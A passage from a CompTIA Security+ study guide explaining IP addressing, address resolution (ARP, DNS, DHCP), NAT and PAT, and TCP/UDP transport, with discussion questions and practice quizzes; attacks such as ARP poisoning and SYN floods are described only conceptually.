4, 2, 3, 7, 6, 5, 1
2. What kind of WAP is designed for use with a central WAN controller? Choose the best response
 Controllerless
 Fat
 Mesh
 Thin

3. What happens to a non-tagged frame on a VLAN trunk?


 It's flooded to all VLANs the trunk carries.
 It's forwarded to the lowest-numbered VLAN.
 It's forwarded to the trunk's native VLAN.
 It's dropped without an error message.

4. What protocol would an echo request packet use?


 ARP
 ICMP
 TCP
 UDP

5. Which storage option is just a refinement of traditional file servers?


 iSCSI
 NAS
 SAN

6. For a point-to-point wireless link between two buildings, what antenna style would keep a strong signal
between transceivers while minimizing the area for eavesdropping? Choose the best response.
 Dipole
 Monopole
 Patch
 Yagi

CompTIA Security+ Exam SY0-501 181


Chapter 4: Network fundamentals / Module B: Network addressing

Module B: Network addressing


IP addresses are very different from MAC addresses not only in their format but their function. Instead of
being a nearly random string meant to uniquely identify a physical device, an IP address is assigned to a host
according to its place in the network's logical topology. This means that even without knowing where a
particular host is on the network, a router can read an IP address and determine what direction the host lies in.
IP addressing standards and assignment are part of basic network function, but they have a lot of security
ramifications as well so they're important to understand. Not only are IP address ranges an important factor in
monitoring and filtering network traffic, but address resolution protocols are a frequent target of network
attacks. Additionally, network address translation used widely on LANs can be either part of a security
strategy, or a compatibility challenge in enacting security controls.
You will learn:
 About IPv4 and IPv6 addresses
 About address resolution protocols
 About network address translation

IPv4 addresses
Both IPv4 and IPv6 addresses follow similar principles, but since the former is more common and uses
simpler addresses, it's an easier place to start.
IPv4 addresses are 32-bit binary values: for readability purposes they're usually written as four octets in
dotted decimal location. It's not just a serial number though: each address has two parts. The network ID
identifies a unique subnet on the wider network, while the host ID identifies a specific host on that subnet.
One reason for this is routing: when you send a packet through a large network like the Internet, no router is
going to know the precise location of every host, but it's easier to keep track of where subnets are. Once the
packet gets to that subnet, its local routers know just where every host is, and can use the rest of the address to
deliver it. It's a lot like mailing a letter out of town: your local post office doesn't have to worry about the
house number, they just need to make sure it goes to the right city. Likewise, if the letter is local, they just can
move right on to checking out the street address.
There's one complication though: It's not like MAC addresses where the first half is manufacturer number and
the second half is serial number. To allow subnets of different sizes, IP addresses have variable length network
IDs and host IDs. Since the two together are always 32-bits, that means if one is larger, the other needs to be
smaller. For example, a network might have a 16-bit network ID and a 16-bit host ID, or it might have a 24-
bit network ID and an 8-bit host ID.

182 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module B: Network addressing

Since the network ID length is variable, there's one more bit of information that's part of an IP address. The
subnet mask is another 32-bit number, but it's always presented as a string of consecutive ones followed by a
string of consecutive zeroes. The ones represent the length of the Network ID, and the zeros the length of the
host ID so you, or any computer, can easily separate the two. The subnet mask is often written in the same
dotted decimal notation, for example 255.255.255.0 for an address with 24 bits of subnet ID and 8 bits of
host ID. It can also be written in prefix notation, simply showing the length of the network ID: the same
subnet mask would be /24.

This doesn't mean IP addresses are effectively 64-bit. First, you don't need to know a computer's subnet mask
to connect to it: only routers and the computer itself need to know. Second, the subnet mask is always
contiguous ones on the left and contiguous zeroes on the right, never mixed or reversed. This means there are
only 33 possible subnet mask values, and even then some are much more common than others.

Classful and classless addressing


Originally, you didn't even need to specify subnet mask. When IPv4 was implemented on ARPANET and later
the Internet, the Internet Assigned Numbers Authority (IANA) was given the authority to allocate IP
addresses to universities, government agencies, ISPs, and other organizations that joined the growing
network. To better organize network assignments, the IANA split up the IPv4 address space into five classes,
according to the value of their first octet. This system was called classful networking.
Class First octet First bits # of subnets # of hosts Subnet mask Mask prefix
A 0.-127. 0 128 16,777,216 255.0.0.0 /8

B 128.-191. 10 16,384 65,536 255.255.0.0 /16

C 192.-223. 110 2,097,152 256 255.255.255. /24


0

D 224.-239. 1110 * * * *

E 240.-254. 1111 * * * *

Of the five, only classes A, B, and C were actual address assignments. Class D was specified for destination-
only multicast addresses, while Class E networks were reserved for experimental use. You can probably see
the pattern in those three, however; while a class A network can have over 16 million hosts, only 128 class A
networks are possible. On the other hand, there are over 2 million Class C networks, each with up to 256
hosts. In any case, classful networking means you don't need to remember the subnet mask: it's obvious from
the IP address. For example, if you're given the address 144.201.5.32, you know that it's a member of a Class
B network, and therefore has a subnet mask of 255.255.0.0.
By the 1990s it was becoming apparent that classful addressing wasn't very flexible, and worse than that was
causing the IPv4 address space to run out more quickly. The solution was classless interdomain routing
(CIDR). Under CIDR, any mask prefix number is allowed, so you can allocate a subnet of any size. For
example, the IANA could assign a Class A network (or /8) range to Asia's regional internet registry (RIR).
The RIR could then break it into 16 smaller /12 subnets of a million addresses apiece to assign to local
registries. In the end, a business might purchase a 1024 address allocation from its local registry, as a /22
subnet.

CompTIA Security+ Exam SY0-501 183


Chapter 4: Network fundamentals / Module B: Network addressing

In the same way, you could also supernet four contiguous Class C (/24) networks, combining them into a
single /22 network. Of course, CIDR is backward compatible with classful networking: a /8, /16, or /24
network can still be defined.

Special IPv4 addresses


In addition to Class D and E addresses, some other specific ranges are reserved for special purposes. It's
important to know what they are, since any packet using one of them is either serving a specific purpose or
isn't legitimate traffic.
 0.0.0.0 is a non-routable address which can either mean the current network, the default route, any
address at all, or a specific error condition, depending on context.
 255.255.255.255 is the broadcast address to the currently configured subnet. Broadcasts aren't
generally routed, so any packet to this address is just sent through the local broadcast domain.
 The entire Class A network 127.0.0.0 is reserved for loopback addresses, which as the name
implies simply point right back to the local host. Most commonly, you'll see 127.0.0.1 used to refer
to the local system.
 Three private network ranges are defined for internal LANs. These network addresses aren't routable
on the Internet, but are instead commonly used on home or office networks.

• 10.0.0.0/8, or the single Class A network with addresses 10.0.0.0 - 10.255.255.255


• 172.16.0.0/12, or the 16 contiguous Class B networks with addresses 172.16.0.0 –
172.31.255.255.
• 192.168.0.0/16, or the 256 contiguous Class C networks with addresses 192.168.0.0 -
192.168.255.255.

 The 169.254.0.0/16 network is reserved for link-local or automatic Private IP addressing


(APIPA) addresses. When a host doesn't have an IP address configured and cannot receive one from a
server, it attempts to choose a unique random value from this range. These addresses are not routable,
but allow self-configuring IP based communication on local networks.

IPv6
There are over four billion possible IPv4 addresses. When the internet was new that seemed like enough, but
they've been used up very rapidly even when you don't account for inefficient assignment and special address
types. Despite some stopgap measures, in 2011 the IANA ran out of unallocated IP addresses, and the various
RIRs have been running out one by one.
The ultimate solution will be the adoption of the newest version: Internet Protocol version 6, or IPv6. IPv6
uses a 128-bit address: this allows 2128 addresses, or over a trillion for each square meter of the Earth's
surface. IPv6 offers several other advantages over IPv4 beyond more addresses too. It allows easier network
configuration, more efficient routing and data flow, and even improved security. The primary drawback is that
it's a much different protocol from IPv4, and isn't backwards-compatible. Today, while many devices and

184 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module B: Network addressing

organizations support it, it's not yet possible to access the entire Internet using IPv6, and might not be for
some time.
Until IPv6 is fully implemented, networks are using a number of migration strategies. Some networks use
tunneling to connect two IPv6 networks over an IPv4 networks. Others use network address translation to
connect IPv4 and IPv6 networks. Still others simply run IPv4 and IPv6 on the same hosts and routers: this
allows you to use IPv6 if your entire path supports it, and IPv4 if not.

IPv6 addresses
The drawback of IPv6 addresses is that they're even bigger on paper than IPv4. Instead of dotted decimal,
they're written as 32 hexadecimal digits, broken into eight groups of four separated by colons.
fe80:0000:0000:0000:c249:3765:00c0:9b22

It might seem very long, but there are some writing conventions you can use to compress addresses with a lot
of zeros. This is important since most IPv6 addresses don't actually use all of their available space.
 Leading zeros in a group don't need to be displayed, so :00c0: can be displayed as :c0: instead.
 A group consisting entirely of zeros can be displayed as :0:
 Once per address, multiple consecutive groups of zeros can be replaced with a double-colon. This
means :0000:0000:0000: can be written as :: instead.

Using this method, the same address could be written as follows.


fe80::c249:3765:c0:9b22

In a typical IPv6 address, the first 64 bits is the network prefix, while the last 64 bits is the device identifier.
 In turn, the network prefix can be broken up into a 48-bit global routing prefix used by routers on the
larger network, and a 16-bit subnet ID used for subnetting inside an organization.
 The device identifier isn't just an arbitrary number: by default it's the device's EUI-64 hardware
address. Since the EUI-64 is either equal to or can be derived from its MAC address, this eases
assignment of unique host addresses on the subnet and helps to unify the network's physical and logical
addressing.

The prefix length can vary with different special address types: like with CIDR addresses, you follow the
overall address with the prefix length, like /48. Like with IPv4, you can specify an entire network by
showing the device identifier, and optionally subnet, as zeros, with normal compression. For example, the
following would be valid names for the same network.
2001:d18:c34d:0:0:0:0:0/48
2001:d18:c34d::/48

CompTIA Security+ Exam SY0-501 185


Chapter 4: Network fundamentals / Module B: Network addressing

IPv6 address scopes


Every IPv6 address has a scope, which is the distance an address is relevant across the wider network. The
scope of an address can usually be easily told from its network ID. Unicast IPv6 addresses which refer to a
single host can be one of four scopes.

Loopback ::1/128 returns to the same interface. Equivalent to 127.0.0.1/8 in IPv4.


Link-local Usable on the local segment, but not routable. Like IPv4's APIPA, but all IPv6
nodes keep a link-local address even if they're also assigned a public address.
Link-local addresses always start with fe80 followed by 54 zero bits, then the
EUI-64, so they're easy to recognize and require no external configuration.
Formally the link-local network uses the address block fe80::/10, while the
individual addresses use the prefix fe80::/64.
Site-local Routable within an organization, but not on public networks, much like IPv4
private networks. Site-local addresses all start in the range fec0 to fef0
followed by 38 zero bits and a 16-bit subnet field. Site-local addressing has been
deprecated, but you might still find it used on existing networks.
Global Routable on public networks such as the Internet. At present, all global unicast
addresses are allocated from the 2000::/3 block, which means they all start
with the bits 001, and the first group is in the range 2000-3fff. Just like IPv4
addresses, the IANA assigns them to RIRs for subnetting on the regional/ISP
level.

Multicast is a lot more widely used in IPv6 than it is in IPv4, partly because it's taken over the duties formerly
served by broadcast. It's more efficient than broadcast: scope allows strict control over how far a given
multicast reaches, and unlike a broadcast a given node only responds to a multicast addresses it's been
configured to. That way, a message only relevant to servers or routers can be sent to a multicast address other
hosts will simply ignore.
Multicast addresses always begin with 1111 1111, or FF. After that is a four-bit flag field, then a four-bit
scope field. Like with unicast addresses, scope can range from loopback to global, and flags are a more
technical matter. Globally routable multicast addresses must be assigned by the IANA.

Discussion: IP addresses
1. How does the network ID in an IPv4 address relate to the host ID?
The network ID on the left identifies the subnet the host belongs to, and the host ID on the right identifies
its place on that subnet. Each can vary in length, but the two together are always 32 bits.
2. In the CIDR address 10.25.100.1 /18, what does /18 mean?
The subnet mask value is 18 consecutive 1 bits followed by 14 0 bits, in other words 255.255.192.0.
3. Why is IPv6 being adopted?
The most pressing reason is the depletion of available IPv4 addresses, but it also makes network
configuration easier, routing more efficient, and security stronger.
4. What address scopes can an IPv6 unicast address have?
From smallest to largest: loopback, link-local, site-local, and global.

186 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module B: Network addressing

Address resolution
IP addresses are at the core of modern networking, but you probably already know there's more to it than that.
On the Data Link layer computers still communicate using physical MAC addresses, while humans, and some
higher level applications, prefer to use text-based domain names such as google.com or comptia.org. The
process of using a higher level address to find out a lower level address is called address resolution.
Address resolution by its nature causes security vulnerabilities. At the simplest level, an attacker can target
address resolution as a denial of service attack—even if the network path is still there, users and applications
will be left unable to find it. More sophisticated attacks instead corrupt address resolution processes,
transparently redirecting traffic to the wrong location. This enables eavesdropping or man-in-the-middle
attacks that users never even notice.

Physical address resolution


When two nodes on the same network segment want to communicate, they might have each other's IP
addresses, but need to learn each other's MAC addresses. Even if it's a host sending packets to its default
gateway, or a router to one of its local hosts, it needs to know the physical address, not just the IP, in order to
send frames there. In IPv4, nodes use the Address Resolution Protocol (ARP). ARP is part of the Link layer of
the TCP/IP model, but it doesn't fit neatly into the OSI model. Sometimes it's called a Layer 2.5 protocol,
since it operates between the Data Link and Network layers.
When a host wants to send an IP packet, it first looks for the recipient in its ARP cache, a list of IP addresses
and their corresponding hardware addresses—in modern networks, almost always MAC addresses. If it's not
there, it sends a broadcast packet called an ARP request over the local network, containing the target's IP
address and the sender's IP and hardware address. Since the packet is broadcast, every node receives it, but
only the target recognizes its IP address. The target responds to the sender with another packet, giving both its
IP and hardware addresses. Finally each host adds the other to its ARP cache.

Hosts also use ARP to announce themselves when they join a network, or to verify that a newly assigned IP
address isn't already in use.
ARP poisoning attacks work by an attacker hijacking this process, sending spoofed ARP messages to associate
the attacker's MAC address with the IP of another host. Since ARP is limited to local network segments, it's
generally only performed by an inside attacker, but it can be used to block, eavesdrop on, or modify traffic.
In IPv6, ARP is replaced by the Neighbor Discovery Protocol (NDP). In addition to ARP's functions, NDP
allows hosts to get other information, like the nearest router, or the network's MTU value.

CompTIA Security+ Exam SY0-501 187


Chapter 4: Network fundamentals / Module B: Network addressing

The Domain Name System


You've certainly seen domain names: anyone using the Internet has. When you enter a fully qualified domain
name (FQDN), like www.javatucana.com, the computer transparently resolves it to an IP address, like
64.99.80.30. When everything's working right, it happens nearly instantly, and you never even have to
worry about the IP address at all. This all happens through the Domain Name System (DNS), a hierarchical
directory service that stores assigned domain names and their corresponding IP addresses.
Domain names are also arranged in a logical hierarchy, but a different one than IP addresses. An FQDN
contains multiple case-insensitive text fields, separated by dots. Unlike IP addresses, the specific host of an
FQDN is on the left rather than the right. There's no fixed number of fields, but to be routed to a specific
computer over the internet, it must have a top level domain (TLD) such as .com or .uk, a domain name
representing an organization within the TLD, and a host name representing a specific host within the domain.
A domain can also add any number of subdomains between itself and the host.

DNS resolution
Exam Objective: CompTIA SY0-501 2.6.1.1, 2.6.2.7
For DNS resolution, a host must be configured with the address of a DNS server or name server. When the
host encounters a FQDN that's not already in its DNS cache or its hosts file, it sends a request to its DNS
server. In turn, the server checks against its own database of domains and addresses. If it doesn't know, it can
contact a higher level server, potentially going as far as the global root servers that maintain the entire DNS
hierarchy. Finally, the server sends the IP address of the FQDN, and the host adds it to its DNS cache.
Local name servers can also respond to partially qualified domain names, valid only within the domain. For
example, while you'd need to enter mail.corporate.javatucana.com to connect to that server from
the Internet, if you're inside Java Tucana's corporate network and querying its local DNS server, you could
probably just enter mail or mail.corporate.
A DNS server's database is comprised of a long list of resource records. Some of these records are the
FQDN/IP mappings used in the resolution process, but there are a wide variety of others. You can use DNS
requests to find a variety of information about a host or its domain, including host operating systems,
available mail servers, and even administrator contact information. Since domain names are assigned all the
time, and owners are free to change what host corresponds to what name whenever they like, DNS servers
constantly exchange and update records using the Dynamic DNS system.
Since DNS hosts constantly have to update their records, attackers can use DNS poisoning exploits to fill a
vulnerable DNS server's cache with incorrect information. This forces any host that contacts that server to
resolve addresses according to the attacker's choosing with no outward sign anything is wrong. A related
malware attack modifies the hosts file on individual systems to override valid DNS results.
Given that the DNS system is such an obvious way for an attacker to launch either DoS or MitM attacks, the
IETF developed the DNS Security (DNSSEC) Extensions to protect against DNS poisoning or other forgeries
by attackers. DNSSEC uses cryptographic signatures to authenticate all responses by secure DNS servers; it
guarantees message integrity, but not availability or confidentiality. While it protects against many attacks,
DNSSEC is challenging to implement on large scale networks, so its deployment to the worldwide internet is
still ongoing.

188 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module B: Network addressing

DHCP
It's a pain manually configuring IP addresses on a whole network, so unless there's a specific reason
otherwise, most hosts are assigned an address from a central Dynamic Host Configuration Protocol (DHCP)
server.

Exam Objective: CompTIA SY0-501 2.6.2.9


Actually there are two distinct protocols in use: DHCPv4 for IPv4 addresses, and DHCPv6 for IPv6
addresses. Each has its own specific functions, but they both share some common features.
 A DHCP server contains a pool of available addresses, called a scope. The server assigns addresses
using leases, which are temporary but renewable assignments.
Note: This isn't the same as the scope of an IP address: instead it's an address range on the
subnet reserved for DHCP addresses.
 Addresses can be assigned dynamically, or by reservation.

• Dynamic assignment is first-come, first-serve. Every time a client connects to the network, it might
have a different IP address.
• Reserved assignment ties an IP address to a computer's unique address. Whenever that computer
reconnects, it receives the same IP address. This can help with security and other network functions,
but it limits how many different computers can connect.

 The DHCP server can assign additional network settings, called DHCP options. Common options
include:

• Default gateway and other router addresses


• DNS server addresses
• Time server or time zone

 If a DHCP server is not on the client's local segment, routers can be configured as DHCP relay agents.
This is necessary since a client with a self-assigned address cannot yet communicate outside of its
broadcast domain.
DHCP doesn't include any means for authentication, so it's difficult for a client to know it's communicating
with a legitimate server, or for a DHCP server to know a request comes from a legitimate client. This allows
for a range of attacks: unauthorized clients can retrieve network address assignments intended for legitimate
ones, or a rogue DHCP server can supply clients with false information such as malicious DNS servers. A
malicious client can even request multiple addresses using different credentials, exhausting the DHCP server's
pool of initial addresses.

CompTIA Security+ Exam SY0-501 189


Chapter 4: Network fundamentals / Module B: Network addressing

Discussion: Address resolution


1. Local host mocha wants to send a packet to remote host kona on its subnet. It knows kona's address is
192.168.100.20. Describe the address resolution process mocha needs to follow.
Mocha first will look in its ARP cache to see if it has kona's MAC address. If not, it will broadcast an
ARP request using kona's IP address. Kona then will respond with its MAC address. Mocha can then send
the packet. Afterward, both hosts add each other to their ARP caches.
2. What does each segment of the FQDN mocha.corporate.javatucana.coffee represent, and who assigned it?
mocha is the host name, and corporate a subdomain: both can be assigned internally by the company.
javatucana is a domain name, and was registered with and approved by a public domain registry. .coffee
is a top level domain, which was approved by the IANA.
3. You want to connect to mocha.corporate.javatucana.coffee over the Internet. Describe the address
resolution process your computer needs to follow.
Your computer will first look for mocha's IP address in its DNS cache. Assuming it isn't, it will send a
DNS request to its DNS server. The server will check its own address records, and consult higher level
servers if necessary. Finally, it will send mocha's IP address to your computer, which will make the
connection. Finally, your computer will add mocha to its DNS cache.
4. What are three ways an attacker can compromise address resolution on a computer?
Changing the computer's hosts file via malware, compromising its DNS cache or that of its DNS server,
or using a fraudulent DHCP server to assign a malicious DNS server.

Address translation
Routers can also connect together two networks that use different address spaces. The most obvious reason is
when the networks use two different L3 protocols, like IP and IPX, or even IPv4 and IPv6; in these cases the
router needs to also convert between the two protocols. But when people mention network address translation
(NAT), what they usually mean is connecting two IPv4 networks that use different addressing schemes. In this
case, all the router really has to do is replace source or destination addresses in the IP header.

Exam Objective: CompTIA SY0-501 3.2.1.7

The most common reason for address translation is when a network using private IP address ranges needs to
connect to the internet. IPv4 exhaustion has made this the norm for home and small office networks: typically,
a consumer class router includes NAT by default. It's also commonly used as a security measure, but it
shouldn't be relied on for that unless it's a small part of a larger strategy. It can even cause problems; for
example, some security protocols like IPsec use address-based authentication, and have serious problems with

190 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module B: Network addressing

NAT traversal as a result. In practice, the security you gain from using a NAT-enabled router has more to do
with its other features such as an internal firewall.
NAT isn't generally necessary in IPv6, even if it's still possible. In fact, one of the main goals of IPv6
development was an address space so large that no network will have a shortage of routable public addresses.
In any case, the goal of NAT is to be transparent: neither the internal nor external hosts need to know it's
happening. This isn't easy, and it's seldom perfect, so there are a lot of little tricks a router has to use to
implement NAT effectively.

NAT methods
There are different methods for implementing NAT, depending what the network's needs are and what address
space is available. To examine the basic methods and their comparative benefits it's easiest to imagine the
common situation of connecting a private IPv4 network to the internet. Remember that these methods are not
all mutually exclusive: NAT implementations in the real world frequently combine multiple methods.
The first way to classify NAT is by how addresses are allocated: this depends on how many public addresses
you have, and how many hosts need to connect to the Internet.

One-to-one Every internal host that connects to the outside network has its own public IP address,
which can either be statically or dynamically assigned from an available pool.
One-to-many Multiple internal hosts simultaneously share a single public IP address. Sometimes also
called NAT overload. While this can potentially allow every host on the network to connect
using a single public address, it makes it more difficult for the router to determine which
internal system is the correct destination for an inbound packet.

The other way to classify NAT is by who is initiating traffic: remote hosts contacting local hosts, or local
hosts contacting remote hosts. Both of these can work in one-to-one and one-to-many situations, though the
details will differ.

Source network Used when traffic is generally initiated by internal systems, for example, client
address translation workstations on the internal network that need to connect to internet servers. When
(SNAT) the local client opens a connection to the outside network, the router changes the
source address in the packet header to a valid public address. One security advantage
of SNAT is that an outside host can't easily initiate connections to local hosts, but
that's a disadvantage for running server applications.
Destination network Used when traffic is generally initiated by external systems, for example internet
address translation clients connecting to local servers. It's just the opposite of SNAT: the remote host
(DNAT) contacts the local host through a public IP address, and the router changes the
destination address in the header to a valid local address. The opposite happens to
response packets. DNAT works well when you have internal servers, but it requires
their address assignments to be configured ahead of time.

Note: The terminology for SNAT and DNAT is very confusing sometimes. In particular, Static NAT and
dynamic NAT refer to IP address allocation, and shouldn't be confused with SNAT and DNAT. Worse,
not everyone is consistent with terminology, so pay careful attention to context in NAT discussion or
documentation.

CompTIA Security+ Exam SY0-501 191


Chapter 4: Network fundamentals / Module B: Network addressing

PAT
While a large network might use a pool of public IP addresses to implement one-to-one NAT allocation, the
typical small office or home network today only uses a single public IP address in a one-to-many
configuration. This means that most of the time today when you encounter discussion of NAT, it actually
refers to port address translation (PAT) used on consumer routers. This is especially true when people
mention limitations of NAT: very often, they're referring to the complications of multiple hosts sharing a
single address.
PAT is a form of SNAT: when an internal host wants to contact the internet, the router changes the source
address and watches for response packets. The added challenge is that since it's also a one-to-many NAT the
local host can't be assigned a unique IP address: it has to share with others. This means that inbound packets
to that address might target different hosts, and the router has to successfully multiplex them.
Fortunately, TCP/IP already has a way to do this, via port numbers. Any given conversation can be identified
by the combination of address and port number. The router just has to take care of one more problem:
ephemeral ports are assigned more or less at random by the operating system, and a given application might
be configured to listen on a specific port, so it's possible for two local hosts to simultaneously use the same
local port.

To keep things straight, the router also translates the source port as well as the source address, and does the
reverse to response packets. This ensures that every conversation maintains a unique identifier, without the
local host consuming a public IP address at all.
Since it's like SNAT, PAT is oriented for outgoing connections, not incoming ones. If you want to run a server
on a PAT network, you can do so by port forwarding. One limitation of this is that any given external port can
only point to one internal system: for instance, if you have one public IP address and multiple internal web
servers, only one of them can use the default port 80.

Discussion: Address translation


1. Aside from limited public IPv4 addresses, why might you use address translation?
It could be part of a security or privacy policy, or it could be a way to easily connect two networks using
different addressing schemes.
2. Compare and contrast PAT and port forwarding.
Both allow multiple hosts to share one public IP address, and both can be used at once, but otherwise
they're different. PAT dynamically translates outgoing port numbers to keep conversations separate, while
port forwarding statically associates particular incoming ports with corresponding internal hosts.
3. What NAT or PAT strategies does your home or office network use?
Answers may vary, but home and small office networks frequently use PAT for workstation connections.

192 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module B: Network addressing

4. How can NAT enhance security?


While not security methods in themselves, SNAT or PAT configurations add another barrier to outside
attackers making unsolicited connections to internal systems. On the down side, they're less compatible
with some network configurations.

Assessment: Network addressing


1. What might a router using PAT change on packets passing through? Choose all that apply.
 Destination port for incoming packets
 Destination port for outgoing packets
 Destination address for incoming packets
 Source address for incoming packets
 Source port for incoming packets
 Source port for outgoing packets

2. What protocol is used to find the MAC address of a given IP address? Choose the best response.
 ARP
 DHCP
 APIPA
 DNS

3. For a local server, you might not need the full domain name to perform a DNS lookup. True or false?
 True
 False

4. Which IPv4 address might be valid on the Internet? Choose the best response.
 127.0.0.1
 150.50.101.32
 169.254.121.68
 192.168.52.52

5. What network attack can only be used on local network segments?


 ARP poisoning
 DNS poisoning
 DNS spoofing
 Man in the middle

6. What protocol can be used to prevent DNS poisoning? Choose the best response.
 DHCP
 DNSSEC
 FQDN
 PAT

CompTIA Security+ Exam SY0-501 193


Chapter 4: Network fundamentals / Module C: Network ports and applications

Module C: Network ports and applications


Above the Network layer, Transport layer protocols like TCP and UDP carry data destined for higher level
application protocols. Application protocols are associated with network ports which combine with IP address
to uniquely identify a communications session. Both of these are very important for security experts to
understand: network ports are essential in the configuration of firewalls and other security appliances, and
insecure application protocols are a large part of a system's potential attack surface.
You will learn:
 About TCP and UDP
 About network ports
 About common network applications

Transport layer protocols


You've seen by now that the Network layer is more complex, and its protocols more "intelligent", than the
Data Link Layer, but at the same time it's still mostly about shoveling data through the network, with little
concern for what hosts do with it. Above it, the Transport layer serves as an interface between the network
and applications above, establishing end-to-end communications between hosts without needing application-
specific functions.
At the most basic, a transport layer datagram carries data between the generic packets of the Network layer
and a specific port or socket, which is available to higher level protocols. This allows multiplexing at the host
level, so data used by a wide variety of applications can be transported over the same network connection.
Transport layer protocols can also be used to establish connections between hosts, perform error correction
and flow control, and ensure proper ordering of data.
In TCP/IP the most common transport layer protocols are Transmission Control Protocol (TCP) and User
Datagram Protocol (UDP). More specialized protocols include Datagram Congestion Control Protocol
(DCCP), Stream Control Transmission Protocol (SCTP), and Resource Reservation Protocol (RSVP).

TCP
You might have guessed that TCP is pretty important in the TCP/IP suite, and you're definitely right. It's by far
the most common protocol used for network data: web traffic, email, and other file transfer applications rely
heavily on TCP to connect hosts.
The data unit of TCP is called the segment, though it's functionally just a Layer 4 datagram in the OSI model.
In IP networks, TCP is a fully-featured transport layer protocol. It provides connection-oriented, reliable
communications, with error correction, flow control, and sequencing. All of those terms have pretty specific
meanings in this context.

Connection-oriented TCP negotiates a virtual connection between two hosts, a dedicated channel that
carries a defined stream of data to the remote host. This connection always requires
two-way communications: even if the ultimate goal is a one-way transfer, the
recipient must be able to acknowledge receipt of data.
Reliable TCP guarantees that all data is successfully delivered to the host. If a segment fails to
arrive, TCP itself handles discovering the failure and resending the segment.
Error correction A TCP segment itself contains a checksum which is used for error detection. Detected
errors are then corrected, since corrupt segments are discovered and resent just like
missing ones.

194 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

Flow control As part of the acknowledgement process, the remote host can regulate the rate of data
flow. This keeps a slow recipient from being overwhelmed by high speed
transmissions.
Sequencing When a long transmission must be broken into many segments, for example a large
file transfer, TCP can guarantee they will be delivered to the upper layers in the
correct sequence, even if the packets on the network arrived out of order. This keeps
applications from being burdened with reassembling fragmented transmissions.

TCP connections
Since it's connection-oriented and reliable, TCP is based around acknowledgement processes: the local host
always knows the remote host is listening and receiving intact data, even if the process is pretty transparent to
the end user unless something goes wrong. Since TCP has such a prominent role in carrying network data and
launching network attacks, to secure networks you need to understand how these acknowledgements work in
principle.
A TCP connection starts with the two hosts exchanging control segments in what's called a three-way
handshake.

To initiate a connection, the local host sends a packet to a listening remote host. It can contain other
information about the desired connection,but the important part is one bit in the header called the synchronize
or SYN flag, marking it as a request to start a new connection.
The remote host needs to report that it received the request. TCP handles these reports through the
acknowledgement bit, or ACK flag. Since TCP connections are duplex, it needs to send a SYN flag too. So
the remote host replies with one packet that has both flags set.
Finally, the local host sends an ACK of its own to signal that it's received the response. Now the connection is
open, and the hosts can exchange data.
A similar handshake is used to break connections in an orderly way, using the FINish flag instead. It's not
three-way, though: each host's FIN/ACK exchange is done separately, for a total of four segments exchanged.
The TCP handshake is another example of how an attacker can exploit ordinary protocol behavior to disrupt
network functions. In a SYN flood, an attacker bombards a vulnerable server with SYN packets seeming to
represent separate session requests, with no intention of actually opening connections. The server responds
normally, but all those requests consume resources since it's left listening for acknowledgments that never
come. Potentially it can be left without capacity to respond to legitimate clients.

CompTIA Security+ Exam SY0-501 195


Chapter 4: Network fundamentals / Module C: Network ports and applications

UDP
TCP's features make it ideal for a lot of network traffic, but it's not perfect. Constant acknowledgements add
to network bandwidth, error detection and correction slows transmissions down, and just about every feature
adds to the header size and the processing work both hosts have to do. If this was just the cost of making
network connections it would be one thing, but some kinds of network traffic don't need all of those features.
This is where the other major transport protocol comes in. UDP is everything TCP is not: it's unreliable,
connectionless, fast, and lightweight. The local host just sends diagrams without setting up a connection or
waiting for acknowledgement, which is good since the remote host never sends any. Datagrams have
checksums so corrupt data can be discarded, but there's no reliability so it's not resent. Everything's quick and
easy with UDP, but there are no guarantees.
This might make UDP sound like a nightmare for data networks, and for a lot of uses it is: that's why TCP is
the more popular of the two. But other times, UDP is a perfect fit.
 Some services' data streams are more time-sensitive than error sensitive, like streaming video or online
multiplayer games: the occasional glitch from a missing packet might be acceptable, but the whole
thing stopping for error correction and resending certainly isn't.
 Services relying on fast exchange of small amounts of data, like DNS or DHCP. For applications like
this, if the remote host doesn't reply promptly, the service can just ask again and still may be quicker
than if it took the time to arrange a TCP connection.
 Some applications are equipped to handle error correction and sequencing themselves: TCP would add
overhead by performing redundant services, so UDP is more efficient.

UDP is also usable by attackers, partly since even normal UDP datagrams aren't associated with formal
communication sessions like TCP. A UDP flood attack bombards a host or network with large amounts of
unsolicited UDP traffic, very often in the form of usually large packets. Not only can this saturate network
capacity, but properly targeted it can generate further traffic as ICMP error messages, and overwhelm the
capacity of firewalls to effectively respond to traffic.

Discussion: Transport layer protocols


1. What features separate TCP from UDP?
TCP is connection-oriented and reliable, while UDP is connectionless and unreliable. TCP has segments,
UDP has datagrams. TCP has error correction, sequencing, and flow control, while UDP has only basic
error detection via a checksum.
2. Label the parts of the TCP three-way handshake.

SYN, SYN/ACK, ACK


3. How does this process allow SYN flood attacks?
In a SYN flood, an attacker bombards a vulnerable server with SYN packets seeming to represent
separate session requests, with no intention of actually opening connections. The server responds
normally, but all those requests consume resources since it's left listening for acknowledgments that never
come. Potentially it can be left without capacity to respond to legitimate clients.

196 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

Network ports
When you open a connection to a remote host using its IP address, there's one more number that's important:
the port, or socket. Instead of identifying a host, the port number represents a certain place on the Transport
layer that represents the end point of the conversation. The header of every TCP segment or UDP datagram
has a destination port, usually representing a specific application on the remote host listening on that port. It
also has a source port, representing where the application on the local host is listening for replies.
TCP/IP Transport protocols like TCP and UDP use 16-bit port numbers, for a range of 65,536 ports. They
don't share one range; instead, each protocol has its own independent ports. For example, TCP port 4000 and
UDP port 4000 could correspond to different applications. In practice, an application that uses multiple
protocols will generally use the same port numbers for each, so this doesn't come up much.
What this means is that each unique communications session can be defined as a unique combination like
"The connection between TCP port A on host X, with TCP port B on host Y." It's this final combination that
lets the transport layer provide true end-to-end communication to the session layer, and the applications
above.

Port ranges
An application can use multiple transport protocols, or multiple ports for a single protocol, but a single port
on a host can be used only by one application at a time. Additionally, applications can communicate easiest
when their ports are easy to find, especially when they're servers waiting for outside connections. For
instance, in theory, a web server could use any port number, but port 80 is standard. This means you never
have to type www.javatucana.com:80 into your web browser, since browsers always assume web servers are
